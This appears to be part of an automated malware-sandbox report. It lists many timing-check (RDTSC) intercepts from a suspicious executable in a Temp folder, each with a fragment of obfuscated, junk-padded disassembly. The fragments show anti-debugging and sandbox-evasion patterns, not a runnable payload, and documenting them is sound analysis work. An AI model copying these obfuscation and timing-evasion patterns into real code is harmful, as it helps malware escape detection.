                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5000090 second address: 50000B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and esp, FFFFFFF8h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov dx, si 0x00000011 call 00007F4C28D8B364h 0x00000016 pop eax 0x00000017 popad 0x00000018 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50000B7 second address: 50000D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 21C6C55Dh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ecx 0x0000000e pushad 0x0000000f mov bx, si 0x00000012 movzx esi, bx 0x00000015 popad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50000D4 second address: 50000D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50000D8 second address: 50000DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50000DE second address: 5000139 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, 07h 0x00000005 pushfd 0x00000006 jmp 00007F4C28D8B369h 0x0000000b xor ah, 00000006h 0x0000000e jmp 00007F4C28D8B361h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ecx 0x00000018 pushad 0x00000019 mov si, 0B53h 0x0000001d movzx eax, bx 0x00000020 popad 0x00000021 push ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F4C28D8B367h 0x00000029 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5000139 second address: 50001C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4C288D038Fh 0x00000009 or cx, 7B9Eh 0x0000000e jmp 00007F4C288D0399h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F4C288D0390h 0x0000001a add ax, 8598h 0x0000001f jmp 00007F4C288D038Bh 0x00000024 popfd 0x00000025 popad 0x00000026 pop edx 0x00000027 pop eax 0x00000028 mov dword ptr [esp], ebx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e pushad 0x0000002f popad 0x00000030 pushfd 0x00000031 jmp 00007F4C288D0391h 0x00000036 xor cl, 00000036h 0x00000039 jmp 00007F4C288D0391h 0x0000003e popfd 0x0000003f popad 0x00000040 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50001C0 second address: 50001D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 mov edx, 2882FBBEh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebx, dword ptr [ebp+10h] 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 movsx edx, ax 0x00000017 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50001D7 second address: 5000221 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F4C288D0398h 0x0000000c adc ecx, 7AEB14B8h 0x00000012 jmp 00007F4C288D038Bh 0x00000017 popfd 0x00000018 popad 0x00000019 xchg eax, esi 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F4C288D0395h 0x00000021 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5000221 second address: 5000274 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B361h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F4C28D8B367h 0x00000011 sub si, 488Eh 0x00000016 jmp 00007F4C28D8B369h 0x0000001b popfd 0x0000001c push eax 0x0000001d push edx 0x0000001e mov dx, ax 0x00000021 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5000274 second address: 5000289 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4C288D038Bh 0x0000000f rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5000289 second address: 50002A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4C28D8B364h 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50002A1 second address: 50002A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50002A5 second address: 50002DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c call 00007F4C28D8B35Dh 0x00000011 push eax 0x00000012 pop edx 0x00000013 pop esi 0x00000014 popad 0x00000015 xchg eax, edi 0x00000016 jmp 00007F4C28D8B366h 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50002DF second address: 50002E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dl, ch 0x00000006 popad 0x00000007 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50002E6 second address: 5000330 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F4C28D8B360h 0x0000000b or esi, 5B5B1D58h 0x00000011 jmp 00007F4C28D8B35Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, edi 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov si, bx 0x00000021 jmp 00007F4C28D8B367h 0x00000026 popad 0x00000027 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5000330 second address: 50003CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 jmp 00007F4C288D0390h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e test esi, esi 0x00000010 pushad 0x00000011 jmp 00007F4C288D038Eh 0x00000016 mov ebx, eax 0x00000018 popad 0x00000019 je 00007F4C9B65E63Eh 0x0000001f pushad 0x00000020 mov ch, F6h 0x00000022 pushfd 0x00000023 jmp 00007F4C288D038Fh 0x00000028 sbb al, FFFFFF8Eh 0x0000002b jmp 00007F4C288D0399h 0x00000030 popfd 0x00000031 popad 0x00000032 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000039 pushad 0x0000003a pushfd 0x0000003b jmp 00007F4C288D038Ch 0x00000040 sub eax, 3E923608h 0x00000046 jmp 00007F4C288D038Bh 0x0000004b popfd 0x0000004c mov eax, 38C5147Fh 0x00000051 popad 0x00000052 je 00007F4C9B65E5F0h 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50003CD second address: 50003D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50003D1 second address: 50003D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50003D5 second address: 50003DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50003DB second address: 50003FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C288D0396h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [esi+44h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50003FD second address: 5000404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, edx 0x00000006 popad 0x00000007 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5000404 second address: 500040C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, di 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 500040C second address: 500041E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 or edx, dword ptr [ebp+0Ch] 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov ebx, 3F78506Ah 0x00000012 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 500041E second address: 50004AF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ah, dl 0x00000008 popad 0x00000009 test edx, 61000000h 0x0000000f pushad 0x00000010 mov dx, cx 0x00000013 call 00007F4C288D0390h 0x00000018 pushfd 0x00000019 jmp 00007F4C288D0392h 0x0000001e and cx, DF88h 0x00000023 jmp 00007F4C288D038Bh 0x00000028 popfd 0x00000029 pop eax 0x0000002a popad 0x0000002b jne 00007F4C9B65E5A7h 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007F4C288D0395h 0x00000038 xor si, 2EA6h 0x0000003d jmp 00007F4C288D0391h 0x00000042 popfd 0x00000043 mov ah, 91h 0x00000045 popad 0x00000046 test byte ptr [esi+48h], 00000001h 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d mov ecx, 7C91FEEBh 0x00000052 mov ax, 9EC7h 0x00000056 popad 0x00000057 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50004AF second address: 50004CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4C28D8B368h 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50300D9 second address: 50300EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4C288D038Eh 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50300EB second address: 5030124 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B35Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007F4C28D8B366h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4C28D8B35Eh 0x00000019 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5030124 second address: 503014B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C288D038Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4C288D0395h 0x00000011 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 503014B second address: 5030151 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5030151 second address: 5030155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5030155 second address: 5030159 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5030159 second address: 503018A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b jmp 00007F4C288D038Fh 0x00000010 sub ebx, ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F4C288D0391h 0x0000001b rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 503018A second address: 503018E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 503018E second address: 5030194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5030194 second address: 50301EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, 3Ah 0x00000005 jmp 00007F4C28D8B35Fh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d test esi, esi 0x0000000f pushad 0x00000010 mov edi, eax 0x00000012 movzx esi, di 0x00000015 popad 0x00000016 je 00007F4C9BAE1530h 0x0000001c pushad 0x0000001d mov eax, edi 0x0000001f mov ecx, edi 0x00000021 popad 0x00000022 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F4C28D8B35Dh 0x00000030 jmp 00007F4C28D8B35Bh 0x00000035 popfd 0x00000036 mov ebx, ecx 0x00000038 popad 0x00000039 mov ecx, esi 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e mov ecx, edi 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50301EE second address: 50301F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50301F3 second address: 5030288 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B366h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F4C9BAE14ECh 0x0000000f jmp 00007F4C28D8B360h 0x00000014 test byte ptr [77E16968h], 00000002h 0x0000001b pushad 0x0000001c mov ecx, 2AA6051Dh 0x00000021 call 00007F4C28D8B35Ah 0x00000026 pop edx 0x00000027 popad 0x00000028 jne 00007F4C9BAE14D0h 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007F4C28D8B35Ah 0x00000035 or eax, 3B2623A8h 0x0000003b jmp 00007F4C28D8B35Bh 0x00000040 popfd 0x00000041 mov esi, 2D07BA9Fh 0x00000046 popad 0x00000047 mov edx, dword ptr [ebp+0Ch] 0x0000004a pushad 0x0000004b mov ebx, esi 0x0000004d jmp 00007F4C28D8B35Ch 0x00000052 popad 0x00000053 xchg eax, ebx 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F4C28D8B35Ah 0x0000005d rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5030288 second address: 5030297 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C288D038Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5030297 second address: 50302E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 mov esi, 4731E967h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F4C28D8B363h 0x00000016 add ax, 7BAEh 0x0000001b jmp 00007F4C28D8B369h 0x00000020 popfd 0x00000021 pushad 0x00000022 pushad 0x00000023 popad 0x00000024 mov dx, ax 0x00000027 popad 0x00000028 popad 0x00000029 xchg eax, ebx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50302E9 second address: 5030304 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C288D0397h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5030304 second address: 5030331 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B369h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4C28D8B35Dh 0x00000011 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5030331 second address: 5030341 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4C288D038Ch 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5030341 second address: 5030380 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov esi, ebx 0x0000000e pushfd 0x0000000f jmp 00007F4C28D8B35Fh 0x00000014 and esi, 6B5661DEh 0x0000001a jmp 00007F4C28D8B369h 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5030380 second address: 5030386 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5030386 second address: 503038A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50303F5 second address: 50303FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 50303FB second address: 503044B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 jmp 00007F4C28D8B367h 0x0000000e pop ebx 0x0000000f pushad 0x00000010 mov edi, eax 0x00000012 jmp 00007F4C28D8B360h 0x00000017 popad 0x00000018 mov esp, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F4C28D8B367h 0x00000021 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 503044B second address: 5030451 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5030451 second address: 5030455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 528C0F second address: 528C77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B367h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F4C28D8B358h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 mov si, 0BD1h 0x00000028 push 00000000h 0x0000002a mov esi, dword ptr [ebp+122D22CCh] 0x00000030 push 00000000h 0x00000032 sub dword ptr [ebp+122D2486h], eax 0x00000038 xchg eax, ebx 0x00000039 jno 00007F4C28D8B35Ah 0x0000003f push eax 0x00000040 push ebx 0x00000041 push eax 0x00000042 push edx 0x00000043 ja 00007F4C28D8B356h 0x00000049 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 529681 second address: 529695 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F4C288D038Ch 0x0000000e rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 529695 second address: 5296AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4C28D8B361h 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5296AA second address: 52971E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C288D0390h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F4C288D0388h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 mov edi, 7A163AAFh 0x0000002b push 00000000h 0x0000002d add dword ptr [ebp+12463680h], ebx 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push ecx 0x00000038 call 00007F4C288D0388h 0x0000003d pop ecx 0x0000003e mov dword ptr [esp+04h], ecx 0x00000042 add dword ptr [esp+04h], 00000018h 0x0000004a inc ecx 0x0000004b push ecx 0x0000004c ret 0x0000004d pop ecx 0x0000004e ret 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 jbe 00007F4C288D038Ch 0x00000058 jo 00007F4C288D0386h 0x0000005e rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 4E933C second address: 4E934A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 jnc 00007F4C28D8B356h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 52D298 second address: 52D307 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4C28D8B362h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push edi 0x0000000f ja 00007F4C28D8B356h 0x00000015 pop edi 0x00000016 push esi 0x00000017 push eax 0x00000018 pop eax 0x00000019 pop esi 0x0000001a popad 0x0000001b nop 0x0000001c push 00000000h 0x0000001e push ebp 0x0000001f call 00007F4C28D8B358h 0x00000024 pop ebp 0x00000025 mov dword ptr [esp+04h], ebp 0x00000029 add dword ptr [esp+04h], 00000018h 0x00000031 inc ebp 0x00000032 push ebp 0x00000033 ret 0x00000034 pop ebp 0x00000035 ret 0x00000036 sub dword ptr [ebp+122D316Ch], eax 0x0000003c push 00000000h 0x0000003e mov bx, ax 0x00000041 movzx edi, ax 0x00000044 push 00000000h 0x00000046 mov ebx, dword ptr [ebp+122D2B00h] 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007F4C28D8B35Dh 0x00000054 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 52E33F second address: 52E357 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B364h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 52F323 second address: 52F36A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F4C288D0386h 0x00000009 jne 00007F4C288D0386h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov dword ptr [esp], eax 0x00000015 jmp 00007F4C288D038Ah 0x0000001a push 00000000h 0x0000001c mov edi, ecx 0x0000001e mov bx, 4300h 0x00000022 push 00000000h 0x00000024 cld 0x00000025 xchg eax, esi 0x00000026 pushad 0x00000027 jng 00007F4C288D038Ch 0x0000002d jns 00007F4C288D0386h 0x00000033 push esi 0x00000034 jnp 00007F4C288D0386h 0x0000003a pop esi 0x0000003b popad 0x0000003c push eax 0x0000003d push ebx 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 53024C second address: 530259 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F4C288D0386h 0x0000000d rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5343B5 second address: 5343C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jc 00007F4C28D8B358h 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
